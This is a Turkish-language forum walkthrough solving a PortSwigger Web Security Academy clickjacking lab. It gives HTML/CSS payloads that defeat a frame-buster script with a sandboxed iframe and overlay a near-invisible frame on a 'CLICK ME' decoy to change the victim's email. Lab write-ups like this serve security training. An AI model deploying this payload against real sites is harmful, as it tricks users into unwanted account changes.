PortSwigger | Clickjacking with a frame buster script

MuhammedTr768

Kıdemli Üye
7 Kas 2021
2,932
1,814
31
MyKrallife
logo.png

Herkese Merhabalar Bugün Tekrardan ClickJacking Lab'ı Çözeceğiz Fakat Bu Sefer Farklı
Bu sefer formları kullanmamıza izin yok peki nasıl çözeceğiz ? Hadi şimdi bakalım

shp4vi9.png

İlk başta tekrar My Account'a basalım
Önceki clickjacking konularımı okuyanlar yapacaklarımızın çoğunu biliyor
ve hesabımıza girelim
wiener peter
Ve email'imiz şu şekilde:
5sdkzgt.PNG

Ve url'e şu şekilde parametremizi girelim
62ir7c9.PNG

Evet şimdi exploit server'a gidelim
3qcnddk.PNG

Body kısmında hello world yazıyor önceki clickjacking lablarındaki gibi
şimdi ise önceki çözdüğümüz clickjackinglerden farkı ne diyerek önceki kodları yazıyoruz
HTML:
<iframe src="https://laburl/[email protected]"></iframe>
Şimdi view exploit diyelim
47baqgl.PNG

ve clickjackingin en önemlisi olan iframe'e izin vermiyor
bu yüzden iframe'i şu şekilde düzenliyoruz
HTML:
<iframe sandbox="allow-forms" src="https://laburl/[email protected]"></iframe>
ve artık gözüküyor
n929m0a.PNG

şimdi ise geri kalan kodlarımızıda yazalım
HTML:
<style>
    iframe {
        position: relative;
        width: 1000px;
        height: 700px;
        opacity: 0.1;
        z-index: 2;
    }
    div {
        position: absolute;
        top: 478px;
        left: 60px;
        z-index: 1;
    }
</style>
<div>CLICK ME</div>
<iframe sandbox="allow-forms" src="https://0a82003b03cb94ffc00e93520"052001e.web-security-academy.net/[email protected]"></iframe>
<div> etiketi CLICK ME yazısını göstermeye yarıyor
<style> ise Bizim yazı ve iframe'i ortalamamıza ve boyutlandırmamıza yarıyor
şimdi ise opacity'i 0.000001 yapalım ki arkaplan gözükmesin
ve view exploit diyelim
ftselgq.PNG

kullanıcı clıck me ye basınca email'i değişecektir
ve store a basıp deliver to exploit victim'e basalım
fwjohh8.PNG

ve çözüldü

Beni Dinlediğiniz İçin Teşekkürler Görüşürüz
agme-ahmet-cem-ersever.gif
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.